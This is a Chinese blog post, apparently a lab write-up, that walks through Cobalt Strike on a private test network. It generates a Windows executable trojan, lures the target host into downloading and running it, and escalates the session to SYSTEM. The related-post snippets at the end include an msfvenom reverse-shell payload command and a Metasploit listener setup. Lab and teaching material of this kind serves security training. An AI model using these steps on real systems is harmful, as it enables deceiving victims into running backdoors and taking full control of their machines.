CS权限提升

已于 2024-08-05 13:10:41 修改
阅读量667 收藏 8
点赞数 19
分类专栏: Cobalt Strike工具用法和实战 文章标签: 网络 网络安全 安全
于 2024-08-04 21:47:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_77778064/article/details/140912074
版权

【实验原理】
        Cobalt Strike是一款用于模拟红队攻击的软件,其目标是致力于缩小渗透测试工具和高级威胁恶意软件之间的差距。
        Cobalt Strike 作为一款后渗透工具,可以完成侦查、鱼叉式钓鱼、浏览器代理等攻击。Cobalt Strike 分为客户端 与服务器两部分,服务器端被称之为 Team Server,Team Server 既是 Beacon payload 的控制器,也是 Cobalt Strike 提 供社工功能的主机,Team Server还存储了Cobalt Strike 收集的数据以及日志记录。

【实验设备】
主机终端:

IP地址
CS服务端kali2020192.168.2.
CS客户端windows2008192.168.2.5
目标主机windows7 192.168.2.20

【实验步骤】

1.打开CS服务端的终端,切换目录至Cobalt Strike工具的目录下,然后启动CS服务器,代码:

cd cs/
./teamserver 192.168.2.10 123456

2.打开CS客户端,进入所上传 cs 客户端文 件夹下,双击 cobaltstrike.bat 程序(出现的黑色弹窗不要关闭),启动客户端。进入 Connect 对话框,设置主机为 192.168.2.10,查看前面生成端口12345,用户名为随意输入,这里输入 neo,密码为teamserver预设的密码 123456,进行连接。

3.制作木马文件。单击菜单栏中【攻击】 →【生成后门】→Windows Executable 选项,制作 exe 木马。

4.弹出 Windows Executable 对话框,由于目标系统为 64 位,所以需将【使用 x64 payload】前的复选框选中。 再单击 Add 按钮,添加监听器,

5.在 New Listener 对话框中,输入名字 test ,端口 4444,单击 Save 按 钮。弹出【输入】对话框,单击【确定】按钮。

6.设置完毕后,单击 Generate 按钮。将文件保存至桌面即可。 

7.win+r输入cmd打开命令窗口,执行命令 cd Desktop,将目录切换至木马文件所在目录。再执行 命令 python -m SimpleHTTPServer 8080, 使用 Python 开启一个简单的 web 服务,端口为 8080。

cd Desktop
python -m SimpleHTTPServer 8080

8.诱骗目标主机下载木马文件。双击桌面左侧的 Google Chrome 图标,打开浏览器,访问 CS 客户端的web 服务 192.168.2.5:8080,单击页面中的 artifact.exe 文件,将其下载到本地

保留

9.打开下载文件夹,双击下载的 artifact.exe 文件,单击【打开文件-安 全警告】对话框中的【运行】按钮,运行木马程序。

10.进入 CS 客户端,可以看见目标主机会话已上线。

11.由于后续操作需要使用 system 权限,因此要进行提权。右击会话,选择【执行】→【提权】选项。

12.在弹出的 Elevate 对话框中单击【开始】按钮,等待几分钟,就能获取 system 权限。

南唐明亮的虾条
关注
  • 19
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-cs上线之提权测试方法
lza20001103的博客
05-08 5173
cs上线之提权方法
C# MVC 权限管理源码
04-17
【C# MVC 权限管理源码】是一个用于构建企业级应用的重要组件,它涉及到用户、角色和权限的管理,是...通过学习和使用这个源码,开发者可以深入理解MVC架构下的权限控制机制,提升在实际项目中的开发效率和应用安全性。
MSF/CS框架提权姿势
懂进攻知防守
08-13 2605
提权,就是提高自己在服务器中的权限。比如在windows下从普通用户提升到administrator或者system权限,linux下普通用户提升到root权限。用户的权限决定了其能够访问的资源。在渗透测试中,我们通过某种方式(比如上传webshell)获取到一个执行命令的shell,但它是一个低权限用户,所以不能执行某些系统命令或者访问某些关键系统资源。此时如果我们想要获取更高的控制权就需要提权。...
操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-25 1373
该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell。这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可。使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置。拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC。执行添加用户的命令时显示拒绝访问。使用CS自带的插件进行绕过提权提权后可以完成添加用户的命令。生成一个MSF的SHELL。
Cobalt Strike四种提权方法
m0_60870041的博客
12-13 1557
肥肠好用的工具 —— cs
Windows提权_CS提权上线。
weixin_39953838的博客
01-04 1457
许多过往之人事,可想可念不可急。
CS_TEST.rar_cs考试
09-21
整个过程中,完成端口模式确保了高效、稳定的数据交换,减少了线程上下文切换的开销,提升了系统的整体性能。 此外,为了保证系统的安全性,还需要考虑认证和授权机制。例如,只有经过身份验证的合法用户才能访问...
通用权限管理系统
08-10
综上所述,通用权限管理系统是企业级应用中不可或缺的一部分,它确保了只有具有相应权限的用户才能访问特定资源,从而保护了系统的数据安全提升了用户体验。通过对用户、登录和权限的有效管理,此类系统能够为企业...
Ubuntu的root权限问题.docx
10-27
Ubuntu遵循一种更加安全权限策略,不鼓励直接以root用户身份登录系统,而是采用sudo命令来临时提升普通用户的权限。这种设计旨在降低因误操作导致系统损坏的风险,同时增强系统的安全性。 首先,让我们了解一下...
ubuntu如何使用root权限.pdf
10-27
`sudo`是"superuser do"的缩写,它是Ubuntu和其他Linux发行版中用于临时提升普通用户权限至root的工具。当需要执行需要管理员权限的命令时,可以在命令前加上`sudo`。例如,安装软件包可以使用`sudo apt-get ...
简单的Metasploit及cs提权
最新发布
m0_74326506的博客
07-06 1903
但是因为windows中存在服务控制管理器,当服务启动时,会跟服务控制管理器通信,服务控制管理器如果没收到通信,则会认为服务出现错误,终止进程,因为后门木马文件本质并不是服务,无法和服务控制管理器进行通信,所以要么直接上线不了,要么上线一会就下线。在windows中 MSI是微软的安装包格式,他会在后台运行.exe,并以system权限启动安装,如果制作一个MSI安装包绑定生成的后门木马,只要win7点击安装,则会以system上线msf,制作MSI安装包可以在网上找。
权限提升WIN篇(腾讯云,CS,MSF)
weixin_56537388的博客
09-18 1185
在云服务器搭建msf的目的,因为我们进行渗透测试的目标不可能只在靶机,我们需要一个公网IP来完成,此外,云服务器需要开启相应的端口,否则不能收到反弹shell。如图,CS是一个多人协同的渗透工具,分为客户端和服务端,服务端可以有多个,多个攻击者连接在一个服务器上,共享攻击资源和目标信息,且拥有各种强大的功能。需要说的是,由于没有经过免杀处理,防火墙,杀毒软件等都会导致不能成功获得反弹shell。根据EXP,可以选择手工操作,基于CS的半自动操作,基于MSF的全自动操作。yum安装 openjdk11。
Windows权限提升-WIN全平台
rumil的博客
03-31 809
windows默认情况下,系统为用户分了7个组,并给每个组赋予不同的操作权限,管理员组(Administrators)、高权限用户组(PowerUsers)、普通用户组(Users)、备份操作组(Backup Operators)、文件复制(Replicator)、来宾用户组(Guests),身份验证用户组(Ahthenticated users)其中备份操作组和文件复制组为维护系统而设置,平时不会被使用。这个成员是系统产生的,真正拥有整台计算机管理权限的账户,一般的操作是无法获取与它等价的权限的。权限提升
CS学习笔记】12、特权提升
TeamsSix 的 CSDN 空间
06-28 1863
0x00 用户账户控制 自 Windows vista 开始,Windows 系统引进了用户账户控制机制,即 UACUser Account Control机制,UAC 机制在 Win 7中得到了完善。UAC 与 UNIX 中的 sudo 工作机制十分相似,平时用户以普通权限工作,当用户需要执行特权操作时,系统会询问他们是否要提升权限。 此时系统用户可分为以下三种等级: 高:管理员权限 中:一般用户权限 低:受限制的权限 使用whoami /groups命令可以看到当前用户所在的组以及权限,使用net lo
cobaltstrike之系统提权
越努力 越自由
06-25 7190
当使用CS获取到一个权限,但是获取的当前权限较低,如普通用户或者administrator权限,我们想提到最高权限如system。可以使用提权功能 右键被控主机——>Access——>Elevate 亲测Windows Server 2008R2、 Win7及以下系统可用。Win10不可用 此时只有两个可以提权的payload 我们选中svc-exe,点击Launch。然后就弹回来一个system权限的beacon 我们也可以自己加入一些提权脚本进去。在Github上有一个提权
第六章-18 提权操作
划水的小白白
12-05 541
零、说明 一般是对一些存在漏洞的win或者linux系统进行exp直接打,从而提权。 但是对于补丁打的比较全的系统,提权就相对复杂一些。 这个时候就需要找一些其他的方向如数据库。 一、启动CS 二、创建监听 三、拿到靶机的会话 , , , 这是CS默认自带的三个提权利用代码。 问题是,有时候用到了除此之外的提权exp时我们怎么办, 这时就需要我们手动导入了。 四、导入提权代码 4.1下载常用脚本, , 4.2导入脚本 , , , , , 五、使用脚本进行提权 , ,
windows提权的几种姿势
weixin_44300286的博客
09-07 4318
一、工具提权 1、msf提权 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值